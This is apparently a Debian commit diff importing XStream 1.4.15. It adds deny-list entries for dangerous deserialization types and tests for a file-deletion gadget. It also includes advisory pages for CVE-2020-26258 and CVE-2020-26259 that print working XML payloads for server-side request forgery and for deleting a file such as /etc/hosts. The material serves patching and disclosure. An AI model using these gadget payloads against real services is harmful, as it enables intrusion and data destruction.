Update upstream source from tag 'upstream/1.4.15'
Update to upstream version '1.4.15'
with Debian dir 69c069b67ff8bb728fa80d7b38983f2e50a40ea5
Markus Koschany
3 years ago
10 | 10 | Before deploying: |
11 | 11 | |
12 | 12 | copy settings-template.xml to ~/.m2/settings.xml adding your Sonatype OSSRH |
13 | username and passwords. | |
13 | username and passwords and also your GPG key and password. | |
14 | 14 | |
15 | 15 | To deploy (optionally adding sources and javadoc jars): |
16 | 16 | mvn deploy |
13 | 13 | <groupId>com.thoughtworks.xstream</groupId> |
14 | 14 | <artifactId>xstream-parent</artifactId> |
15 | 15 | <packaging>pom</packaging> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | <name>XStream Parent</name> |
18 | 18 | <url>http://x-stream.github.io</url> |
19 | 19 | <description> |
409 | 409 | <dependency> |
410 | 410 | <groupId>com.thoughtworks.xstream</groupId> |
411 | 411 | <artifactId>xstream</artifactId> |
412 | <version>1.4.14</version> | |
412 | <version>1.4.15</version> | |
413 | 413 | </dependency> |
414 | 414 | <dependency> |
415 | 415 | <groupId>com.thoughtworks.xstream</groupId> |
416 | 416 | <artifactId>xstream</artifactId> |
417 | <version>1.4.14</version> | |
417 | <version>1.4.15</version> | |
418 | 418 | <classifier>tests</classifier> |
419 | 419 | <type>test-jar</type> |
420 | 420 | <scope>test</scope> |
422 | 422 | <dependency> |
423 | 423 | <groupId>com.thoughtworks.xstream</groupId> |
424 | 424 | <artifactId>xstream</artifactId> |
425 | <version>1.4.14</version> | |
425 | <version>1.4.15</version> | |
426 | 426 | <classifier>javadoc</classifier> |
427 | 427 | <scope>provided</scope> |
428 | 428 | </dependency> |
429 | 429 | <dependency> |
430 | 430 | <groupId>com.thoughtworks.xstream</groupId> |
431 | 431 | <artifactId>xstream-hibernate</artifactId> |
432 | <version>1.4.14</version> | |
432 | <version>1.4.15</version> | |
433 | 433 | </dependency> |
434 | 434 | <dependency> |
435 | 435 | <groupId>com.thoughtworks.xstream</groupId> |
436 | 436 | <artifactId>xstream-hibernate</artifactId> |
437 | <version>1.4.14</version> | |
437 | <version>1.4.15</version> | |
438 | 438 | <classifier>javadoc</classifier> |
439 | 439 | <scope>provided</scope> |
440 | 440 | </dependency> |
441 | 441 | <dependency> |
442 | 442 | <groupId>com.thoughtworks.xstream</groupId> |
443 | 443 | <artifactId>xstream-jmh</artifactId> |
444 | <version>1.4.14</version> | |
444 | <version>1.4.15</version> | |
445 | 445 | </dependency> |
446 | 446 | <dependency> |
447 | 447 | <groupId>com.thoughtworks.xstream</groupId> |
448 | 448 | <artifactId>xstream-jmh</artifactId> |
449 | <version>1.4.14</version> | |
449 | <version>1.4.15</version> | |
450 | 450 | <classifier>javadoc</classifier> |
451 | 451 | <scope>provided</scope> |
452 | 452 | </dependency> |
453 | 453 | <dependency> |
454 | 454 | <groupId>com.thoughtworks.xstream</groupId> |
455 | 455 | <artifactId>xstream-benchmark</artifactId> |
456 | <version>1.4.14</version> | |
456 | <version>1.4.15</version> | |
457 | 457 | </dependency> |
458 | 458 | <dependency> |
459 | 459 | <groupId>com.thoughtworks.xstream</groupId> |
460 | 460 | <artifactId>xstream-benchmark</artifactId> |
461 | <version>1.4.14</version> | |
461 | <version>1.4.15</version> | |
462 | 462 | <classifier>javadoc</classifier> |
463 | 463 | <scope>provided</scope> |
464 | 464 | </dependency> |
633 | 633 | <groupId>javax.xml.bind</groupId> |
634 | 634 | <artifactId>jaxb-api</artifactId> |
635 | 635 | <version>${version.javax.xml.bind.api}</version> |
636 | </dependency> | |
637 | <dependency> | |
638 | <groupId>com.sun.xml.ws</groupId> | |
639 | <artifactId>jaxws-rt</artifactId> | |
640 | <version>${version.javax.xml.ws.jaxws.rt}</version> | |
636 | 641 | </dependency> |
637 | 642 | |
638 | 643 | <dependency> |
843 | 848 | <groupId>org.apache.maven.plugins</groupId> |
844 | 849 | <artifactId>maven-gpg-plugin</artifactId> |
845 | 850 | <version>${version.plugin.maven.gpg}</version> |
851 | <configuration> | |
852 | <keyname>${gpg.keyname}</keyname> | |
853 | <passphraseServerId>${gpg.keyname}</passphraseServerId> | |
854 | </configuration> | |
846 | 855 | </plugin> |
847 | 856 | <plugin> |
848 | 857 | <groupId>org.apache.maven.plugins</groupId> |
1113 | 1122 | <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy> |
1114 | 1123 | <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer> |
1115 | 1124 | <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe> |
1116 | <version.plugin.maven.gpg>1.4</version.plugin.maven.gpg> | |
1125 | <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg> | |
1117 | 1126 | <version.plugin.maven.install>2.2</version.plugin.maven.install> |
1118 | 1127 | <version.plugin.maven.jar>2.2</version.plugin.maven.jar> |
1119 | 1128 | <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc> |
1141 | 1150 | <version.javax.annotation.api>1.3.2</version.javax.annotation.api> |
1142 | 1151 | <version.javax.inject>2.4.0</version.javax.inject> |
1143 | 1152 | <version.javax.xml.bind.api>2.3.1</version.javax.xml.bind.api> |
1153 | <version.javax.xml.ws.jaxws.rt>2.2</version.javax.xml.ws.jaxws.rt><!-- Java 5 --> | |
1144 | 1154 | <version.jmock>1.0.1</version.jmock> |
1145 | 1155 | <version.joda-time>1.6</version.joda-time> |
1146 | 1156 | <version.junit>3.8.1</version.junit> |
1154 | 1164 | <version.org.jdom2>2.0.5</version.org.jdom2> |
1155 | 1165 | <version.org.json>20080701</version.org.json> |
1156 | 1166 | <version.org.openjdk.jmh>1.21</version.org.openjdk.jmh> |
1157 | <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- java 6 --> | |
1167 | <version.org.ops4j.pax.exam>3.5.0</version.org.ops4j.pax.exam><!-- Java 6 --> | |
1158 | 1168 | <version.org.slf4j>1.6.1</version.org.slf4j> |
1159 | 1169 | <version.stax>1.2.0</version.stax> |
1160 | 1170 | <version.stax.api>1.0.1</version.stax.api> |
19 | 19 | <id>ossrh-staging</id> |
20 | 20 | <username>your-sonatype.org-id</username> |
21 | 21 | <password>your-sonatype.org-pwd</password> |
22 | </server> | |
22 | </server> | |
23 | <server> | |
24 | <id>${gpg.keyname}</id> | |
25 | <password>your-gpg-key-pwd</password> | |
26 | </server> | |
23 | 27 | </servers> |
28 | <properties> | |
29 | <gpg.keyname>your-gpg-keyname</gpg.keyname> | |
30 | </properties> | |
24 | 31 | </settings> |
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream</artifactId> |
19 | 19 | <packaging>jar</packaging> |
141 | 141 | <groupId>commons-lang</groupId> |
142 | 142 | <artifactId>commons-lang</artifactId> |
143 | 143 | <scope>test</scope> |
144 | </dependency> | |
145 | ||
146 | <dependency> | |
147 | <groupId>com.sun.xml.ws</groupId> | |
148 | <artifactId>jaxws-rt</artifactId> | |
149 | <scope>test</scope> | |
150 | <exclusions> | |
151 | <exclusion> | |
152 | <groupId>javax.xml.ws</groupId> | |
153 | <artifactId>jaxws-api</artifactId> | |
154 | </exclusion> | |
155 | <exclusion> | |
156 | <groupId>com.sun.istack</groupId> | |
157 | <artifactId>istack-commons-runtime</artifactId> | |
158 | </exclusion> | |
159 | <exclusion> | |
160 | <groupId>com.sun.xml.bind</groupId> | |
161 | <artifactId>jaxb-impl</artifactId> | |
162 | </exclusion> | |
163 | <exclusion> | |
164 | <groupId>com.sun.xml.messaging.saaj</groupId> | |
165 | <artifactId>saaj-impl</artifactId> | |
166 | </exclusion> | |
167 | <exclusion> | |
168 | <groupId>com.sun.xml.stream.buffer</groupId> | |
169 | <artifactId>streambuffer</artifactId> | |
170 | </exclusion> | |
171 | <exclusion> | |
172 | <groupId>com.sun.xml.ws</groupId> | |
173 | <artifactId>policy</artifactId> | |
174 | </exclusion> | |
175 | <exclusion> | |
176 | <groupId>com.sun.org.apache.xml.internal</groupId> | |
177 | <artifactId>resolver</artifactId> | |
178 | </exclusion> | |
179 | <exclusion> | |
180 | <groupId>org.glassfish.gmbal</groupId> | |
181 | <artifactId>gmbal-api-only</artifactId> | |
182 | </exclusion> | |
183 | <exclusion> | |
184 | <groupId>org.jvnet</groupId> | |
185 | <artifactId>mimepull</artifactId> | |
186 | </exclusion> | |
187 | <exclusion> | |
188 | <groupId>org.jvnet.staxex</groupId> | |
189 | <artifactId>stax-ex</artifactId> | |
190 | </exclusion> | |
191 | </exclusions> | |
144 | 192 | </dependency> |
145 | 193 | </dependencies> |
146 | 194 |
336 | 336 | private static final Pattern IGNORE_ALL = Pattern.compile(".*"); |
337 | 337 | private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator"); |
338 | 338 | private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*"); |
339 | private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream"); | |
339 | 340 | |
340 | 341 | /** |
341 | 342 | * Constructs a default XStream. |
641 | 642 | } |
642 | 643 | |
643 | 644 | addPermission(AnyTypePermission.ANY); |
644 | denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"}); | |
645 | denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO}); | |
645 | denyTypes(new String[]{ | |
646 | "java.beans.EventHandler", // | |
647 | "java.lang.ProcessBuilder", // | |
648 | "javax.imageio.ImageIO$ContainsFilter", // | |
649 | "jdk.nashorn.internal.objects.NativeString" }); | |
650 | denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM}); | |
646 | 651 | allowTypeHierarchy(Exception.class); |
647 | 652 | securityInitialized = false; |
648 | 653 | } |
0 | 0 | /* |
1 | 1 | * Copyright (C) 2006 Joe Walnes. |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers. | |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers. | |
3 | 3 | * All rights reserved. |
4 | 4 | * |
5 | 5 | * The software in this package is published under the terms of the BSD |
278 | 278 | final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF); |
279 | 279 | XML_NAME_CHARS_4TH.set('-'); |
280 | 280 | XML_NAME_CHARS_4TH.set('.'); |
281 | XML_NAME_CHARS_4TH.set('0', '9'); | |
281 | XML_NAME_CHARS_4TH.set('0', '9' + 1); | |
282 | 282 | XML_NAME_CHARS_4TH.set(0xB7); |
283 | 283 | |
284 | 284 | final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone(); |
405 | 405 | XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1); |
406 | 406 | |
407 | 407 | XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH); |
408 | XML_NAME_CHARS_5TH.set(0x300, 0x36F); | |
409 | XML_NAME_CHARS_5TH.set(0x203F, 0x2040); | |
408 | XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1); | |
409 | XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1); | |
410 | 410 | |
411 | 411 | XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone(); |
412 | 412 | XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH); |
492 | 492 | // First, fast (common) case: nothing to escape |
493 | 493 | int i = 0; |
494 | 494 | |
495 | for (; i < length; i++ ) { | |
496 | char c = name.charAt(i); | |
497 | if (c == '$' || c == '_' || c <= 27 || c >= 127) { | |
495 | for (; i < length; i++) { | |
496 | final char c = name.charAt(i); | |
497 | if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') { | |
498 | 498 | break; |
499 | 499 | } |
500 | 500 | } |
0 | 0 | /* |
1 | 1 | * Copyright (C) 2005, 2006 Joe Walnes. |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers. | |
2 | * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers. | |
3 | 3 | * All rights reserved. |
4 | 4 | * |
5 | 5 | * The software in this package is published under the terms of the BSD |
76 | 76 | initialize = elementName.charAt(0) == '['; |
77 | 77 | } |
78 | 78 | return Class.forName(elementName, initialize, classLoader); |
79 | } catch (ClassNotFoundException e) { | |
79 | } catch (final ClassNotFoundException e) { | |
80 | throw new CannotResolveClassException(elementName); | |
81 | } catch (final IllegalArgumentException e) { | |
80 | 82 | throw new CannotResolveClassException(elementName); |
81 | 83 | } |
82 | 84 | } |
10 | 10 | package com.thoughtworks.acceptance; |
11 | 11 | |
12 | 12 | import java.beans.EventHandler; |
13 | import java.io.File; | |
14 | import java.io.FileOutputStream; | |
15 | import java.io.IOException; | |
16 | import java.io.InputStream; | |
17 | import java.io.OutputStream; | |
13 | 18 | import java.util.Iterator; |
14 | 19 | |
15 | 20 | import com.thoughtworks.xstream.XStream; |
212 | 217 | // OK |
213 | 218 | } |
214 | 219 | } |
220 | ||
221 | public void testCannotUseJaxwsInputStreamToDeleteFile() { | |
222 | if (JVM.isVersion(5)) { | |
223 | final String xml = "" | |
224 | + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" | |
225 | + " <tempFile>target/junit/test.txt</tempFile>\n" | |
226 | + "</is>"; | |
227 | ||
228 | xstream.aliasType("is", InputStream.class); | |
229 | try { | |
230 | xstream.fromXML(xml); | |
231 | fail("Thrown " + ConversionException.class.getName() + " expected"); | |
232 | } catch (final ForbiddenClassException e) { | |
233 | // OK | |
234 | } | |
235 | } | |
236 | } | |
237 | ||
238 | public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException { | |
239 | if (JVM.isVersion(5)) { | |
240 | final File testDir = new File("target/junit"); | |
241 | final File testFile = new File(testDir, "test.txt"); | |
242 | try { | |
243 | testDir.mkdirs(); | |
244 | ||
245 | final OutputStream out = new FileOutputStream(testFile); | |
246 | out.write("JUnit".getBytes()); | |
247 | out.flush(); | |
248 | out.close(); | |
249 | ||
250 | assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists()); | |
251 | ||
252 | final String xml = "" | |
253 | + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" | |
254 | + " <tempFile>target/junit/test.txt</tempFile>\n" | |
255 | + "</is>"; | |
256 | ||
257 | xstream.addPermission(AnyTypePermission.ANY); // clear out defaults | |
258 | xstream.aliasType("is", InputStream.class); | |
259 | ||
260 | InputStream is = null; | |
261 | try { | |
262 | is = (InputStream)xstream.fromXML(xml); | |
263 | } catch (final ForbiddenClassException e) { | |
264 | // OK | |
265 | } | |
266 | ||
267 | assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists()); | |
268 | ||
269 | byte[] data = new byte[10]; | |
270 | is.read(data); | |
271 | is.close(); | |
272 | ||
273 | assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists()); | |
274 | } finally { | |
275 | if (testFile.exists()) { | |
276 | testFile.delete(); | |
277 | } | |
278 | if (testDir.exists()) { | |
279 | testDir.delete(); | |
280 | } | |
281 | } | |
282 | } | |
283 | } | |
215 | 284 | } |
186 | 186 | assertBothWays("\"", "<string>"</string>"); |
187 | 187 | } |
188 | 188 | |
189 | public void testsDigitsOnly() { | |
190 | xstream.alias("0123456789", String.class); | |
191 | assertBothWays("", "<_.0030123456789></_.0030123456789>"); | |
192 | } | |
193 | ||
189 | 194 | public void testDecimalFormatSymbols() { |
190 | 195 | final String xml; |
191 | 196 | if (!JVM.is14()) { |
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream-benchmark</artifactId> |
19 | 19 | <packaging>jar</packaging> |
13 | 13 | <parent> |
14 | 14 | <groupId>com.thoughtworks.xstream</groupId> |
15 | 15 | <artifactId>xstream-parent</artifactId> |
16 | <version>1.4.14</version> | |
16 | <version>1.4.15</version> | |
17 | 17 | </parent> |
18 | 18 | <artifactId>xstream-distribution</artifactId> |
19 | 19 | <packaging>pom</packaging> |
21 | 21 | |
22 | 22 | <p>All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is |
23 | 23 | affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security |
24 | framework</a> with a white list.</p> | |
24 | framework</a> with a whitelist.</p> | |
25 | 25 | |
26 | 26 | <h2 id="description">Description</h2> |
27 | 27 | |
108 | 108 | input stream.</p> |
109 | 109 | |
110 | 110 | <h2 id="workaround">Workaround</h2> |
111 | <p>As recommended, use XStream's security framework to implement a white list for the allowed types.</p> | |
112 | <p>Users of XStream 1.4.13 who want to use XStream default black list can simply add two lines to XStream's setup code:</p> | |
111 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
112 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add two lines to XStream's setup code:</p> | |
113 | 113 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); |
114 | 114 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); |
115 | 115 | </pre></div> |
116 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from | |
116 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
117 | 117 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, |
118 | 118 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>java.lang.Void</em> and <em>void</em>.</p> |
119 | 119 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" }); |
138 | 138 | |
139 | 139 | <h2 id="credits">Credits</h2> |
140 | 140 | |
141 | <p>Chen L reported the issue to XStream and provided the required information to reproduce it. The issue was found | |
142 | by Zhihong Tian and Hui Lu, both from Guangzhou University.</p> | |
141 | <p>Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was | |
142 | supported by Zhihong Tian and Hui Lu, both from Guangzhou University.</p> | |
143 | 143 | |
144 | 144 | </body> |
145 | 145 | </html>⏎ |
0 | <html> | |
1 | <!-- | |
2 | Copyright (C) 2020 XStream committers. | |
3 | All rights reserved. | |
4 | ||
5 | The software in this package is published under the terms of the BSD | |
6 | style license a copy of which has been included with this distribution in | |
7 | the LICENSE.txt file. | |
8 | ||
9 | Created on 24. November 2020 by Joerg Schaible | |
10 | --> | |
11 | <head> | |
12 | <title>CVE-2020-26258</title> | |
13 | </head> | |
14 | <body> | |
15 | ||
16 | <h2 id="vulnerability">Vulnerability</h2> | |
17 | ||
18 | <p>CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams | |
19 | from an arbitrary URL referencing a resource in an intranet or the local host.</p> | |
20 | ||
21 | <h2 id="affected_versions">Affected Versions</h2> | |
22 | ||
23 | <p>All versions until and including version 1.4.14 are affected running in a Java environment below Java 15, if | |
24 | using the version out of the box. No user is affected, who followed the recommendation to setup | |
25 | <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p> | |
26 | ||
27 | <h2 id="description">Description</h2> | |
28 | ||
29 | <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. | |
30 | XStream creates therefore new instances based on these type information. An attacker can manipulate the processed | |
31 | input stream and replace or inject objects, that result in a server-side forgery request.</p> | |
32 | ||
33 | <h2 id="reproduction">Steps to Reproduce</h2> | |
34 | ||
35 | <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and | |
36 | unmarshal it again with XStream:</p> | |
37 | <div class="Source XML"><pre><map> | |
38 | <entry> | |
39 | <jdk.nashorn.internal.objects.NativeString> | |
40 | <flags>0</flags> | |
41 | <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'> | |
42 | <dataHandler> | |
43 | <dataSource class='javax.activation.URLDataSource'> | |
44 | <url>http://localhost:8080/internal/:</url> | |
45 | </dataSource> | |
46 | <transferFlavors/> | |
47 | </dataHandler> | |
48 | <dataLen>0</dataLen> | |
49 | </value> | |
50 | </jdk.nashorn.internal.objects.NativeString> | |
51 | <string>test</string> | |
52 | </entry> | |
53 | </map> | |
54 | </pre></div> | |
55 | <div class="Source Java"><pre>XStream xstream = new XStream(); | |
56 | xstream.fromXML(xml); | |
57 | </pre></div> | |
58 | ||
59 | <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p> | |
60 | ||
61 | <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p> | |
62 | ||
63 | <h2 id="impact">Impact</h2> | |
64 | ||
65 | <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly | |
66 | available only by manipulating the processed input stream.</p> | |
67 | ||
68 | <h2 id="workaround">Workaround</h2> | |
69 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
70 | <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can | |
71 | simply add two lines to XStream's setup code:</p> | |
72 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" }); | |
73 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
74 | </pre></div> | |
75 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup | |
76 | code:</p> | |
77 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
78 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); | |
79 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
80 | </pre></div> | |
81 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
82 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, | |
83 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>, | |
84 | <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p> | |
85 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
86 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); | |
87 | xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" }); | |
88 | </pre></div> | |
89 | <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently | |
90 | know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p> | |
91 | <div class="Source Java"><pre>xstream.registerConverter(new Converter() { | |
92 | public boolean canConvert(Class type) { | |
93 | return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class | |
94 | || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString") | |
95 | || type == java.lang.Void.class || void.class || Proxy.isProxy(type) | |
96 | || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream")); | |
97 | } | |
98 | ||
99 | public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | |
100 | throw new ConversionException("Unsupported type due to security reasons."); | |
101 | } | |
102 | ||
103 | public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) { | |
104 | throw new ConversionException("Unsupported type due to security reasons."); | |
105 | } | |
106 | }, XStream.PRIORITY_LOW); | |
107 | </pre></div> | |
108 | ||
109 | <h2 id="credits">Credits</h2> | |
110 | ||
111 | <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p> | |
112 | ||
113 | </body> | |
114 | </html>⏎ |
0 | <html> | |
1 | <!-- | |
2 | Copyright (C) 2020 XStream committers. | |
3 | All rights reserved. | |
4 | ||
5 | The software in this package is published under the terms of the BSD | |
6 | style license a copy of which has been included with this distribution in | |
7 | the LICENSE.txt file. | |
8 | ||
9 | Created on 06. December 2020 by Joerg Schaible | |
10 | --> | |
11 | <head> | |
12 | <title>CVE-2020-26259</title> | |
13 | </head> | |
14 | <body> | |
15 | ||
16 | <h2 id="vulnerability">Vulnerability</h2> | |
17 | ||
18 | <p>CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long | |
19 | as the executing process has sufficient rights.</p> | |
20 | ||
21 | <h2 id="affected_versions">Affected Versions</h2> | |
22 | ||
23 | <p>All versions until and including version 1.4.14 are affected running in a Java environment containing the JAX-WS | |
24 | runtime, if using the version out of the box. No user is affected, who followed the recommendation to setup | |
25 | <a href="security.html#framework">XStream's security framework</a> with a whitelist.</p> | |
26 | ||
27 | <h2 id="description">Description</h2> | |
28 | ||
29 | <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects. | |
30 | XStream creates therefore new instances based on these type information. An attacker can manipulate the processed | |
31 | input stream and replace or inject objects, that result in a server-side forgery request.</p> | |
32 | ||
33 | <h2 id="reproduction">Steps to Reproduce</h2> | |
34 | ||
35 | <p>Create a simple HashMap and use XStream to marshal it to XML. Replace the XML with following snippet and | |
36 | unmarshal it again with XStream:</p> | |
37 | <div class="Source XML"><pre><map> | |
38 | <entry> | |
39 | <jdk.nashorn.internal.objects.NativeString> | |
40 | <flags>0</flags> | |
41 | <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'> | |
42 | <dataHandler> | |
43 | <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> | |
44 | <contentType>text/plain</contentType> | |
45 | <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'> | |
46 | <tempFile>/etc/hosts</tempFile> | |
47 | </is> | |
48 | </dataSource> | |
49 | <transferFlavors/> | |
50 | </dataHandler> | |
51 | <dataLen>0</dataLen> | |
52 | </value> | |
53 | </jdk.nashorn.internal.objects.NativeString> | |
54 | <string>test</string> | |
55 | </entry> | |
56 | </map> | |
57 | </pre></div> | |
58 | <div class="Source Java"><pre>XStream xstream = new XStream(); | |
59 | xstream.fromXML(xml); | |
60 | </pre></div> | |
61 | ||
62 | <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p> | |
63 | ||
64 | <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p> | |
65 | ||
66 | <h2 id="impact">Impact</h2> | |
67 | ||
68 | <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing | |
69 | process has sufficient rights only by manipulating the processed input stream.</p> | |
70 | ||
71 | <h2 id="workaround">Workaround</h2> | |
72 | <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types.</p> | |
73 | <p>Users of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can | |
74 | simply add two lines to XStream's setup code:</p> | |
75 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" }); | |
76 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
77 | </pre></div> | |
78 | <p>Users of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream's setup | |
79 | code:</p> | |
80 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
81 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class }); | |
82 | xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" }); | |
83 | </pre></div> | |
84 | <p>Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from | |
85 | scratch and deny at least the following types: <em>javax.imageio.ImageIO$ContainsFilter</em>, | |
86 | <em>java.beans.EventHandler</em>, <em>java.lang.ProcessBuilder</em>, <em>jdk.nashorn.internal.objects.NativeString</em>, | |
87 | <em>java.lang.Void</em> and <em>void</em> and deny several types by name pattern.</p> | |
88 | <div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" }); | |
89 | xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class }); | |
90 | xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" }); | |
91 | </pre></div> | |
92 | <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently | |
93 | know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p> | |
94 | <div class="Source Java"><pre>xstream.registerConverter(new Converter() { | |
95 | public boolean canConvert(Class type) { | |
96 | return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class | |
97 | || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString") | |
98 | || type == java.lang.Void.class || void.class || Proxy.isProxy(type) | |
